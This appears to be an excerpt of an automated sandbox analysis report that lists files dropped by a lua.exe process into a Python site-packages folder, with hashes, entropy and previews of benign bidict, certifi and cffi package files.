SSDEEP:	96:tbjosoMjImghg1D6zxz2VLS2wTTEYdB1ajrnpRUA2t3NtorSIJz/ZGxY0ANmojuJ:tbcsIxe1k85wUsaj9+BoYxYRmHC0ZxjX
MD5:	632281FB8EDBDBFC0336D7D048409667
SHA1:	36BA9D2E42DF3BC1648F1B1AB701F28D8E913022
SHA-256:	C8C2117C3B58E43409A00788E58BC85B8F4EE3632E2AA2BCAB10EB733AF53506
SHA-512:	D37DD633EF3720DB4DF095304487461A663EA485CD5989245B16F10499F8F3CDD5FDC36364A7FD74B997AFFB4945385A6C2792D7F3ED867987B1B7309B86BB2E
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/....#==============================================================================.# * Welcome to the bidict source code *.#==============================================================================..# Doing a code review? You'll find a "Code review nav" comment like the one.# below at the top and bottom of the most important source files. This provides.# a suggested initial path through the source when reviewing..#.# Note: If you aren't reading this on https://github.com/jab/bidict, you may be.# viewing an outdated version of the code. Please head to GitHub to review the.# latest version, which contains important improvements over older versions..#.# Thank you for reading and for any

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_orderedbidict.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3409
Entropy (8bit):	4.503022918198489
Encrypted:	false
SSDEEP:	48:pnLP82aJ+LoOIK4t6vHtaUQfeW/TUrTKjVPUMqyvPLVWBW/:tbjPu6vHnG/wrCQMhWC
MD5:	9F3D42129FD92C596AF3C4AAAA7BC909
SHA1:	5E694E737CCFECF33F00AAD0F36AECBCF7B59ED4
SHA-256:	B647C03317A12DEB4CA93AC6A10ABD29F74EA6045D8735AAA7696693AFF8BCBD
SHA-512:	1E9E7ECE6B9AD4625F1A4A04171309F13578D94A42F45494D7FA57D8B84BF72D8EDB727F46B9FA1F6A766F0838E58EAA1F57CE88ACF7E972CCB725270B1AF23D
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/....#==============================================================================.# * Welcome to the bidict source code *.#==============================================================================..# Doing a code review? You'll find a "Code review nav" comment like the one.# below at the top and bottom of the most important source files. This provides.# a suggested initial path through the source when reviewing..#.# Note: If you aren't reading this on https://github.com/jab/bidict, you may be.# viewing an outdated version of the code. Please head to GitHub to review the.# latest version, which contains important improvements over older versions..#.# Thank you for reading and for any

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_typing.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	862
Entropy (8bit):	5.218685600149469
Encrypted:	false
SSDEEP:	24:lTR4Wrm8FwhY2s+AAAKx55LUfG8oZo6n644O1m40:pnLFG5BU+8oZXt4n40
MD5:	FC5ED2766176433E62416517C15243CE
SHA1:	91097A2C94DC5FBCB6A7709CD6B1FDE161EF44A3
SHA-256:	DE5ABEC198561B29F7ABB7AEC3A60AECBC059F1395075A9DA97D71D47716E0D8
SHA-512:	88FF4484C4634E8D6239D5CD4FCA624003DB1913AB53CD23A9ADEC48BCAA9AEFA04D97399E4E354A967A963B2407950B4D6AD35364122304B23D895A0AB01310
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/...."""Provide typing-related objects."""..import typing as _t...KT = _t.TypeVar('KT').VT = _t.TypeVar('VT').IterItems = _t.Iterable[_t.Tuple[KT, VT]].MapOrIterItems = _t.Union[_t.Mapping[KT, VT], IterItems[KT, VT]]..DT = _t.TypeVar('DT') #: for default arguments.VDT = _t.Union[VT, DT]...class _BareReprMeta(type):. def __repr__(cls) -> str:. return f'<{cls.__name__}>'...class _NONE(metaclass=_BareReprMeta):. """Sentinel type used to represent 'missing'."""...OKT = _t.Union[KT, _NONE] #: optional key type.OVT = _t.Union[VT, _NONE] #: optional value type.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\_version.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	117
Entropy (8bit):	4.621474797647588
Encrypted:	false
SSDEEP:	3:SHQlqXb9cFWARQ7RYZG7zGN6zRXv3VyLQdLxr85Scn:SwlqXb+sARQ7CG7qN6iQdNoZn
MD5:	BE486188DCBDFC84902EF9AA434761F9
SHA1:	7CD7DA94E81509E6E1CC2BB4CF6CD8548E56BFFA
SHA-256:	7B85AEDC5E2DFA08F54DA88B61A758110FF747CA4D1B3E178B52B878DD56148C
SHA-512:	F1E5BD63ACA0348E47D8102A91974B35779ADB8D538CBEAF4FF69E0CE001EC8C1C584EEA0076377171376A54FABFF99C421F7A40653A95A3CB24F903DF10F291
Malicious:	false
Preview:	# coding: utf-8.# file generated by setuptools_scm.# don't change, don't track in version control.version = '0.21.2'.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\bidict\metadata.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1812
Entropy (8bit):	5.0482076760722805
Encrypted:	false
SSDEEP:	24:lTR4Wrm8gEdivY01/hwz/B10576+Xm443GCJwQ9movyO4koE2v:pnLglvYrz510s+XAGCJmGvvI
MD5:	8995E2BBB9A1CB4D63D87F9A974B62BC
SHA1:	EC7B7E8E716AE75B8E0E6865BA53E629AD616DBD
SHA-256:	86D1177AABBB92932759E44AAE5E1C5096414086C17A0C60BBF6F1159D292246
SHA-512:	B5DAFF6AA33E1485FF7362B516D71AB9633A3E20B43BF9F21C92929A7074C0F004E05E1654E085E7690F067DF3762C986F0805D6D5D24D4B416E1164062AB808
Malicious:	false
Preview:	# -- coding: utf-8 --.# Copyright 2009-2020 Joshua Bronson. All Rights Reserved..#.# This Source Code Form is subject to the terms of the Mozilla Public.# License, v. 2.0. If a copy of the MPL was not distributed with this.# file, You can obtain one at http://mozilla.org/MPL/2.0/..."""Define bidict package metadata."""...# _version.py is generated by setuptools_scm (via its `write_to` param, see setup.py).try:. from ._version import version.except (ImportError, ValueError, SystemError): # pragma: no cover. try:. import pkg_resources. except ImportError:. __version__ = '0.0.0.VERSION_NOT_FOUND'. else:. try:. __version__ = pkg_resources.get_distribution('bidict').version. except pkg_resources.DistributionNotFound:. __version__ = '0.0.0.VERSION_NOT_FOUND'.else: # pragma: no cover. __version__ = version..try:. __version_info__ = tuple(int(p) if i < 3 else p for (i, p) in enumerate(__version__.split('.'))).except Except

C:\ProgramData\ShellExperienceHost\Lib\site-packages\certifi-2020.12.5.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\certifi-2020.12.5.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1048
Entropy (8bit):	5.0660471199970525
Encrypted:	false
SSDEEP:	24:AAJHkvLu4J70RRrZNC5nRvN8kg4ahrmZBzCP07U5:AAeK4JQrruBJctOBmP0W
MD5:	F77F61D14EE6FEAC4228D3EBD26CC1F1
SHA1:	EA754E241E066D60AA3E231D0C05A88B06B564B4
SHA-256:	6A70A4BF6B010016D59A64B8AE4AD8DC7F5EF16F1FB453CC2ECD771C5A341131
SHA-512:	F460C5BBD0D48EDBC5BE42A77D8A27BD2B688D1AB28B1B6AA82211784AA8A38734C7FF13B617647A00D182A3A2B54433464175602509BCF24836A4057C4FF293
Malicious:	false
Preview:	This packge contains a modified version of ca-bundle.crt:..ca-bundle.crt -- Bundle of CA Root Certificates..Certificate data from Mozilla as of: Thu Nov 3 19:04:19 2011#.This is a bundle of X.509 certificates of public Certificate Authorities.(CA). These were automatically extracted from Mozilla's root certificates.file (certdata.txt). This file can be found in the mozilla source tree:.http://mxr.mozilla.org/mozilla/source/security/nss/lib/ckfw/builtins/certdata.txt?raw=1#.It contains the certificates in PEM format and therefore.can be directly used with curl / libcurl / php_curl, or with.an Apache+mod_ssl webserver for SSL client authentication..Just configure this file as the SSLCACertificateFile.#..*** BEGIN LICENSE BLOCK *.This Source Code Form is subject to the terms of the Mozilla Public License,.v. 2.0. If a copy of the MPL was not distributed with this file, You can obtain.one at http://mozilla.org/MPL/2.0/...* END LICENSE BLOCK ***.@(#) $RCSfile: certdata.txt,v $

C:\ProgramData\ShellExperienceHost\Lib\site-packages\certifi-2020.12.5.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2994
Entropy (8bit):	4.989178283347949
Encrypted:	false
SSDEEP:	48:DfGcq5+fy+GbFaDYxLiPkbOfzAaBZhYRztu0DpjMAmT7p3vTVfTXU+h+qLcUydy+:DfnqUxGbFaDYxmPkbGQn5DpjLmT7p3vm
MD5:	4D2B655AB51CFCC10949845D9C1F8BCB
SHA1:	400D9F606500464A92EC16C802F0FC5EE4B2DCC8
SHA-256:	484C391861C8781C06C0326C2146957C440073926AB3F5E87CE7D35FEFE4084D
SHA-512:	471C3DE5337E06361C3E1C940708627E5A94A813CBFFC94338E3ADD2E73080450213A2860722BB1EA6B120B3F48E240CDF434357177145B3D43867307DDDBCE4
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: certifi.Version: 2020.12.5.Summary: Python package for providing Mozilla's CA Bundle..Home-page: https://certifiio.readthedocs.io/en/latest/.Author: Kenneth Reitz.Author-email: me@kennethreitz.com.License: MPL-2.0.Project-URL: Documentation, https://certifiio.readthedocs.io/en/latest/.Project-URL: Source, https://github.com/certifi/python-certifi.Platform: UNKNOWN.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0).Classifier: Natural Language :: English.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.3.Classifier: Programming Language :: Python :: 3.4.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\certifi-2020.12.5.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.8083867942654095
Encrypted:	false
SSDEEP:	24:HqVn/2zDlVvLeVY5jrVKVmqVl29yq4Q1hDfp7nWtOwKyaKGr8qU00:inuXjj2Y5jJimCl2UQ1hDBL5KGW/
MD5:	2EB818CD806597E38AF32C76548D7923
SHA1:	F6F69E65FDD02EF1853571479AF428805F3BABBC
SHA-256:	26A70A65C911BD445CE8015006A32BE37F7EE5DC06F253149D889F269F429C34
SHA-512:	FA7C1FB770CDCD236E53ACCE4B9A4EB2A38B03408BBE9A0C63C5D720937762F720CB677C3522E0A10BAB38BA1324892B5AC5BEE75E24D5B10238CF0611E18148
Malicious:	false
Preview:	certifi-2020.12.5.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..certifi-2020.12.5.dist-info/LICENSE,sha256=anCkv2sBABbVmmS4rkrY3H9e8W8ftFPMLs13HFo0ETE,1048..certifi-2020.12.5.dist-info/METADATA,sha256=SEw5GGHIeBwGwDJsIUaVfEQAc5Jqs_XofOfTX-_kCE0,2994..certifi-2020.12.5.dist-info/RECORD,,..certifi-2020.12.5.dist-info/WHEEL,sha256=ADKeyaGyKF5DwBNE0sRE5pvW-bSkFMJfBuhzZ3rceP4,110..certifi-2020.12.5.dist-info/top_level.txt,sha256=KMu4vUCfsjLrkPbSNdgdekS-pVJzBAJFO__nI8NF6-U,8..certifi/__init__.py,sha256=SsmdmFHjHCY4VLtqwpp9P_jsOcAuHj-5c5WqoEz-oFg,62..certifi/__main__.py,sha256=xBBoj905TUWBLRGANOcf7oi6e-3dMP4cEoG9OyMs11g,243..certifi/__pycache__/__init__.cpython-37.pyc,,..certifi/__pycache__/__main__.cpython-37.pyc,,..certifi/__pycache__/core.cpython-37.pyc,,..certifi/cacert.pem,sha256=u3fxPT--yemLvyislQRrRBlsfY9Vq3cgBh6ZmRqCkZc,263774..certifi/core.py,sha256=V0uyxKOYdz6ulDSusclrLmjbPgOXsD0BnEf0SQ7OnoE,2303..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\certifi-2020.12.5.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.816968543485036
Encrypted:	false
SSDEEP:	3:RtEeX7MWcSlVii6KRRP+tPCCf7irO5S:RtBMwlViGjWBBwt
MD5:	D25A99ECD1ECB535EE4E31874B0C7B95
SHA1:	B80780FBBF97A5FBF433C4F692E340632EA675F1
SHA-256:	00329EC9A1B2285E43C01344D2C444E69BD6F9B4A414C25F06E873677ADC78FE
SHA-512:	539E072414E6E8AD3BFAEDB0587507443B39826814FB330B57D605FB5FBE61134D3548359F41A14CC63B44E23EF0AA1E62EA1C4A2F3B344BE548F4C2C8143976
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: bdist_wheel (0.35.1).Root-Is-Purelib: true.Tag: py2-none-any.Tag: py3-none-any..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\certifi-2020.12.5.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:HZ:HZ
MD5:	5EBD7F7C387EBB31C14E3C701023AC97
SHA1:	BC5EA804A025DFFDE14FBF3746E34487196073D7
SHA-256:	28CBB8BD409FB232EB90F6D235D81D7A44BEA552730402453BFFE723C345EBE5
SHA-512:	7F2312A62A532E761DC45D0FF45FFE3FA599360AC0399D59EC8A39045C9E8CB62C912FC6C6F3A1C45ADBCAA10DDE77A8493567BB478839819C15F5FDD7E5C889
Malicious:	false
Preview:	certifi.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\certifi\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	62
Entropy (8bit):	4.391808867796259
Encrypted:	false
SSDEEP:	3:1LGzbQbAwLSkJXLvvP:1LcQbjJvP
MD5:	BC9F2DE40134228ADC4EA47CA70A0BAA
SHA1:	70D0A614D3E4E46C16D7B207B10A4C89F61C7D75
SHA-256:	4AC99D9851E31C263854BB6AC29A7D3FF8EC39C02E1E3FB97395AAA04CFEA058
SHA-512:	85AB4D140B85110AF74B54DD9416CE5CEC835668814FE728C64BF24C23EAB0475428D376CD80E721A54D9E0AC17BCD42A6E058CE63825019B11DBE450C678B29
Malicious:	false
Preview:	from .core import contents, where..__version__ = "2020.12.05".

C:\ProgramData\ShellExperienceHost\Lib\site-packages\certifi\__main__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	243
Entropy (8bit):	4.451797874382859
Encrypted:	false
SSDEEP:	6:JW6yXBbjB2V+WuSZFeewrCy00y+0re6r/hu:JWfQYWuSZWFdQhu
MD5:	269E7F0CA2FA570B10E690595E6AEDAB
SHA1:	F09C4BA5E7EE37DDEBE914DEF9D97152CB5EB856
SHA-256:	C410688FDD394D45812D118034E71FEE88BA7BEDDD30FE1C1281BD3B232CD758
SHA-512:	01CA6DF3FB218B374BBA6653F5E72D6D6A9B07BB22215D5D96D2155DF037A9C6ED8D4F0FF8C789231A6C8C2555229700056FF6F740516F42F839E057FFF59F70
Malicious:	false
Preview:	import argparse..from certifi import contents, where..parser = argparse.ArgumentParser().parser.add_argument("-c", "--contents", action="store_true").args = parser.parse_args()..if args.contents:. print(contents()).else:. print(where()).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\certifi\cacert.pem Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	263774
Entropy (8bit):	6.05068805145507
Encrypted:	false
SSDEEP:	6144:fWXdA7M8f9ZJm5plXqXCRrcMBHADwYCuMsliO:fWS7vZI5LACRrcMOb/
MD5:	1BA3B44F73A6B25711063EA5232F4883
SHA1:	1B1A84804F896B7085924F8BF0431721F3B5BDBE
SHA-256:	BB77F13D3FBEC9E98BBF28AC95046B44196C7D8F55AB7720061E99991A829197
SHA-512:	0DD2A14331308B1DE757D56FAB43678431E0AD6F5F5B12C32FA515D142BD955F8BE690B724E07F41951DD03C9FEE00E604F4E0B9309DA3EA438C8E9B56CA581B
Malicious:	false
Preview:	.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

C:\ProgramData\ShellExperienceHost\Lib\site-packages\certifi\core.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2303
Entropy (8bit):	4.511121053674014
Encrypted:	false
SSDEEP:	48:bpq/kD5+zZ0bY7eu7DDMQT/9dKa8q8wJZBprf0vk:g/kdjbY7xDtDKfVwrBprfCk
MD5:	E9695A9F9664E50346014590A276EDED
SHA1:	427C0CFA4131820D8F999AE3999C0DEAECAD5E5A
SHA-256:	574BB2C4A398773EAE9434AEB1C96B2E68DB3E0397B03D019C47F4490ECE9E81
SHA-512:	D5B793F637DD7CA4049FE82962917B9F2E9DD87B7B26F4710E18C66E00E7D3040C5A136D920D141562D335B1F2B277B48A8F67AEA8ECCFAE8F10329422DB4DF4
Malicious:	false
Preview:	# -- coding: utf-8 --..""".certifi.py.~~~~~~~~~~..This module returns the installation location of cacert.pem or its contents..""".import os..try:. from importlib.resources import path as get_path, read_text.. _CACERT_CTX = None. _CACERT_PATH = None.. def where():. # This is slightly terrible, but we want to delay extracting the file. # in cases where we're inside of a zipimport situation until someone. # actually calls where(), but we don't want to re-extract the file. # on every call of where(), so we'll do it once then store it in a. # global variable.. global _CACERT_CTX. global _CACERT_PATH. if _CACERT_PATH is None:. # This is slightly janky, the importlib.resources API wants you to. # manage the cleanup of this file, so it doesn't actually return a. # path, it returns a context manager that will give you the path. # when you enter it and will do any cleanup when you l

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi-1.14.4.dist-info\INSTALLER Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi-1.14.4.dist-info\LICENSE Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.935991038897493
Encrypted:	false
SSDEEP:	24:A/4y0e/M/YL+4JNOG0yPcgte01h/Y9QHY6sUv4fxHOk4/+n0p3oqiFw:00e0/YL3JNOGlPcENSQHY6s5fPOp3o5u
MD5:	DF848F212D07F5BAFD416F76B3FB6F2A
SHA1:	FAF3B19E6B98FEE291F08961E158D932309080A4
SHA-256:	7AC11950E72DF5B45C51716A7B22E7BB34B324D67F065E2938152DD472C4815F
SHA-512:	D2B298E07C012CA96CB8F16C875CCD55B23324DBF7670125A78F62E8AB32FAAD7EEAA363562B78BAF6D41F22EB156702B79B8EC4C06BFA56EAC9964F49935643
Malicious:	false
Preview:	..Except when otherwise stated (look for LICENSE files in directories or..information at the beginning of each file) all software and..documentation is licensed as follows: .... The MIT License.... Permission is hereby granted, free of charge, to any person .. obtaining a copy of this software and associated documentation .. files (the "Software"), to deal in the Software without .. restriction, including without limitation the rights to use, .. copy, modify, merge, publish, distribute, sublicense, and/or .. sell copies of the Software, and to permit persons to whom the .. Software is furnished to do so, subject to the following conditions:.... The above copyright notice and this permission notice shall be included .. in all copies or substantial portions of the Software..... THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS .. OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, .. FITNESS FOR A PARTIC

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi-1.14.4.dist-info\METADATA Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1191
Entropy (8bit):	4.889338490395058
Encrypted:	false
SSDEEP:	24:DlnaZMQD9cXTHZftDZftOKW0ZftWZft2Zft2ZftDZftYZftRTZft90Zft7neZftm:DlnaZMQsljwiaa6DYxLixsxHQ3MZQVh
MD5:	09DE702EC4EEEE474A47CF7D0E3F8C2E
SHA1:	85B9BA1A5D46921B12A1E2B5A7E0A5FDADF801B9
SHA-256:	ECA2EB2A2C73793046812CD88648D326A8D16A32CFD4491C37FC46FDB55284BD
SHA-512:	53D43E7F96F217E238B170FF11BF88C4420EA87A15EF3EB1AF9C779D60198C9059F6D5571AF1831C68393029C61903A9E6C7D9248BACFA06B6FA5D4368F7B8C8
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: cffi.Version: 1.14.4.Summary: Foreign Function Interface for Python calling C code..Home-page: http://cffi.readthedocs.org.Author: Armin Rigo, Maciej Fijalkowski.Author-email: python-cffi@googlegroups.com.License: MIT.Platform: UNKNOWN.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 2.Classifier: Programming Language :: Python :: 2.6.Classifier: Programming Language :: Python :: 2.7.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.2.Classifier: Programming Language :: Python :: 3.3.Classifier: Programming Language :: Python :: 3.4.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: PyPy.Classifier: License :: OSI Approved :: MIT License.Requires-Dist: pycparser...CFFI.====..Foreign Function

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi-1.14.4.dist-info\RECORD Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2880
Entropy (8bit):	5.805973209484052
Encrypted:	false
SSDEEP:	48:cTyYnuXd07g2gYqL2flfQTegbG8/8u1XV+np0tv/bHHzsX4MFaV3Gu7t:Ey3XqfdQTegb/8u1XV+p8v/bnz2TFaVD
MD5:	8A5D2F2AC17BC3E8FFDA546CD330E3F2
SHA1:	EDD39A62EC3C3767CDA4CB16B503A8274091ABE6
SHA-256:	7084CE08AE68138B0EF0D0EB3C4DC0842C5B076CDFD5C9DEE7A065782601C25B
SHA-512:	ECDC550C60F33C348B5DFD07509899B15DD89329B42211752C64B61C53BD408435EC3A31A1CF9D37C50B605AA9C3520C1075BA86C94BA585ED42F0530A0ECA11
Malicious:	false
Preview:	_cffi_backend.cp37-win32.pyd,sha256=Drm4ADnUobxVBw1FMFbhyJSoqPWYHOQ2z-CxfjiESNA,146944..cffi-1.14.4.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cffi-1.14.4.dist-info/LICENSE,sha256=esEZUOct9bRcUXFqeyLnuzSzJNZ_Bl4pOBUt1HLEgV8,1320..cffi-1.14.4.dist-info/METADATA,sha256=7KLrKixzeTBGgSzYhkjTJqjRajLP1EkcN_xG_bVShL0,1191..cffi-1.14.4.dist-info/RECORD,,..cffi-1.14.4.dist-info/WHEEL,sha256=SYKICiw7EPrpyOeCIuAJswXTZAWXbJBHvAYcpuUpX1M,102..cffi-1.14.4.dist-info/entry_points.txt,sha256=Q9f5C9IpjYxo0d2PK9eUcnkgxHc9pHWwjEMaANPKNCI,76..cffi-1.14.4.dist-info/top_level.txt,sha256=rE7WR3rZfNKxWI9-jn6hsHCAl7MDkB-FmuQbxWjFehQ,19..cffi/__init__.py,sha256=cZPh5zl2j5Zp7h2-a8VlqWYWQ1AJ3POlA0aBvDh9TL0,527..cffi/__pycache__/__init__.cpython-37.pyc,,..cffi/__pycache__/api.cpython-37.pyc,,..cffi/__pycache__/backend_ctypes.cpython-37.pyc,,..cffi/__pycache__/cffi_opcode.cpython-37.pyc,,..cffi/__pycache__/commontypes.cpython-37.pyc,,..cffi/__pycache__/cparser.cpython-37.pyc,,..cffi/__

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi-1.14.4.dist-info\WHEEL Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	102
Entropy (8bit):	5.045097529036378
Encrypted:	false
SSDEEP:	3:RtED7MWcSlVilv6gP+tkSrLcyn:RtEMwlVilv6gWKSrLcyn
MD5:	450D9B4C9318D561EBF9DD24C23E8BE0
SHA1:	07648F2D1F33CFEAF6F9681F76C5B498FC7EA6B7
SHA-256:	4982880A2C3B10FAE9C8E78222E009B305D36405976C9047BC061CA6E5295F53
SHA-512:	7C63ECE85118249B1B153772EB710D86D5ABA09D1DAAFC7AE412A737E12FD9CA31D53EF55E508CA4BFA29467E970670E25A7E36B11DF81E8B25EA83C6DECEA0C
Malicious:	false
Preview:	Wheel-Version: 1.0..Generator: bdist_wheel (0.35.1)..Root-Is-Purelib: false..Tag: cp37-cp37m-win32....

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi-1.14.4.dist-info\entry_points.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	76
Entropy (8bit):	4.315453547119663
Encrypted:	false
SSDEEP:	3:+Mlc3yMnJpoDRQlY3HnJz:+MyyMnJpORQaJz
MD5:	5ABE3588FDA16B05DF44A5C5ECCA34DF
SHA1:	85585480C856EB45360935F59C8C24F519959F72
SHA-256:	43D7F90BD2298D8C68D1DD8F2BD794727920C4773DA475B08C431A00D3CA3422
SHA-512:	BDD2234096710840E7BC065994FF2A6AEBCB78EED43021802679405B189AB2A14230432134D39DE30F11F5F7EB167494042F7C732D63CC3E039376935948972E
Malicious:	false
Preview:	[distutils.setup_keywords].cffi_modules = cffi.setuptools_ext:cffi_modules..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cffi-1.14.4.dist-info\top_level.txt Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	19
Entropy (8bit):	3.260828171224456
Encrypted:	false
SSDEEP:	3:xvcDQvn:x5n
MD5:	67EA4A90C355E59A4EB7026E12E6AA43
SHA1:	5A38C6F6B4BA1CF98F2377DB77F55A568089D94C
SHA-256:	AC4ED6477AD97CD2B1588F7E8E7EA1B0708097B303901F859AE41BC568C57A14
SHA-512:	D3FFAFF727C7B534E3DFB0FE8D93011C0B1AD5F4731F7B01B2247AF5A01ED52095234ADF046B6F843CB1A45692E55125F544848B5AE31923150185DB8DA63A0A
Malicious:	false
Preview:	_cffi_backend.cffi.

